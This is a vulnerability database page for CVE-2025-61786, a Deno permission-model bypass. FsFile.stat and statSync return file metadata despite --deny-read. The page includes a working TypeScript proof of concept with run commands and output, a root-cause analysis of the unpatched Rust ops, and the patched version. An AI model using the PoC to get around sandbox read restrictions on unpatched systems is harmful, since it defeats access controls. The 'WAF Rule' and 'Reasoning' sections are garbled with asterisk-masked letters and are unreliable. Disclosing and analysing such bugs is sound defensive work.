3.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-61786

GHSA ID

GHSA-qq26-84mh-26j9

EPSS Score

0.01025%

CWE

CWE-269

Published

10/8/2025

Updated

10/8/2025

KEV Status

Technology

Rust

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-61786

CVE-2025-61786: Deno's --deny-read check does not prevent permission bypass

Summary

Deno.FsFile.prototype.stat and Deno.FsFile.prototype.statSync are not limited by the permission model check --deny-read=./.

It's possible to retrieve stats from files that the user do not have explicit read access to (the script is executed with --deny-read=./)

Similar APIs like Deno.stat and Deno.statSync require allow-read permission, however, when a file is opened, even with file-write only flags and deny-read permission, it's still possible to retrieve file stats, and thus bypass the permission model.

PoC

Setup:

deno --version
deno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)
v8 13.7.152.14-rusty
typescript 5.8.3

touch test1.txt

poc_file.stat.ts

// touch test1.txt
// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.stat
// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1
// deno run --allow-write=./ poc_file.stat.ts 1
async function poc1(){
    using file = await Deno.open("./test1.txt", { read: false, write: true});
    const fileInfo = await file.stat();
    console.log(fileInfo.isFile);
}

// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.statSync
// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2
// deno run --allow-write=./ poc_file.stat.ts 2
function poc2(){
    using file = Deno.openSync("./test1.txt", { read: false, write: true});
    const fileInfo = file.statSync();
    console.log(fileInfo.isFile);
}

// https://docs.deno.com/api/deno/~/Deno.stat
// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3
// deno run --allow-write=./ poc_file.stat.ts 3
async function poc3(){
    // not executed
    const fileInfo = await Deno.stat("./test1.txt");
    console.log(fileInfo.isFile);
}

// https://docs.deno.com/api/deno/~/Deno.statSync
// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4
// deno run --allow-write=./ poc_file.stat.ts 4
function poc4(){
    // not executed
    const fileInfo = Deno.statSync("./test1.txt");
    console.log(fileInfo.isFile);
}


async function main(){
    const poc = Deno.args[0] || 1;

    const status = await Deno.permissions.query({ name: "read", path: "./" });
    console.log(status);
    switch (poc) {
        case "1":
            poc1()
            break;
        case "2":
            poc2()
            break;
        case "3":
            poc3()
            break;
        case "4":
            poc4()
            break;
        default:
            poc1()
    }
}

main()

Output:

deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1

PermissionStatus { state: "denied", onchange: null }
true

deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2

PermissionStatus { state: "denied", onchange: null }
true

deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3

PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires read access to "./test1.txt", run again with the --allow-read flag
    const fileInfo = await Deno.stat("./test1.txt");
                                ^
    ...

deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4

PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires read access to "./test1.txt", run again with the --allow-read flag
    const fileInfo = Deno.statSync("./test1.txt");
                          ^
    ...

Impact

Permission model bypass

(GitHub Advisory)

3.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-61786

GHSA ID

GHSA-qq26-84mh-26j9

EPSS Score

0.01025%

CWE

CWE-269

Published

10/8/2025

Updated

10/8/2025

KEV Status

Technology

Rust

Technical Details

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
deno	rust	< 2.5.3	2.5.3

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability allows bypassing Deno's read permission checks. The PoC demonstrates that when a script is run with --deny-read, it's still possible to get file metadata using file.stat() and file.statSync() on a file handle that was opened with only write permissions.

The root cause is in the underlying native Rust functions (ops) that implement the JavaScript API. The functions op_fs_file_stat_sync and op_fs_file_stat_async in ext/fs/ops.rs were responsible for getting the file statistics. However, as shown in the patch, the original implementations of these functions did not perform any permission checks. They would directly retrieve the file stats for the given file resource ID.

The fix, seen in commit 1ab2268c0bcbf9b0468e0e36963f77f8c31c73ec, introduces a permission check within both functions. It now retrieves the file path associated with the resource and calls check_open with a Read access kind. If the script does not have read permissions for that path, the operation will fail, thus closing the security hole.

Therefore, the vulnerable functions are the original versions of op_fs_file_stat_sync and op_fs_file_stat_async before the security patch was applied. These are the functions that would appear in a runtime profile when the vulnerable Deno.FsFile.prototype.stat or Deno.FsFile.prototype.statSync methods are called.

Vulnerable functions

op_fs_file_stat_sync

ext/fs/ops.rs

This function is the backing implementation for `Deno.FsFile.prototype.statSync`. The vulnerability lies in the fact that this function directly calls `file.stat_sync()` without first checking for read permissions. The patch adds a call to `state.borrow::<P>().check_open()` to enforce the read permission check before accessing file stats, thus mitigating the permission bypass.

op_fs_file_stat_async

ext/fs/ops.rs

This function is the backing implementation for `Deno.FsFile.prototype.stat`. The vulnerability lies in the fact that this function directly calls `file.stat_async()` without first checking for read permissions. The patch adds a call to `state.borrow().borrow::<P>().check_open()` to enforce the read permission check before accessing file stats, thus mitigating the permission bypass.

WAF Protection Rules

WAF Rule

### Summ*ry `**no.*s*il*.prototyp*.st*t` *n* `**no.*s*il*.prototyp*.st*tSyn*` *r* not limit** *y t** p*rmission mo**l ****k `--**ny-r***=./`. It's possi*l* to r*tri*v* st*ts *rom *il*s t**t t** us*r *o not **v* *xpli*it r*** ****ss to (t** s*ript

Reasoning

T** vuln*r**ility *llows *yp*ssin* **no's r*** p*rmission ****ks. T** Po* **monstr*t*s t**t w**n * s*ript is run wit* `--**ny-r***`, it's still possi*l* to **t *il* m*t***t* usin* `*il*.st*t()` *n* `*il*.st*tSyn*()` on * *il* **n*l* t**t w*s op*n** w

3.3

Basic Information

Concerned about an active attack path?

CVE-2025-61786: Deno's --deny-read check does not prevent permission bypass

Summary

PoC

Impact

3.3

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI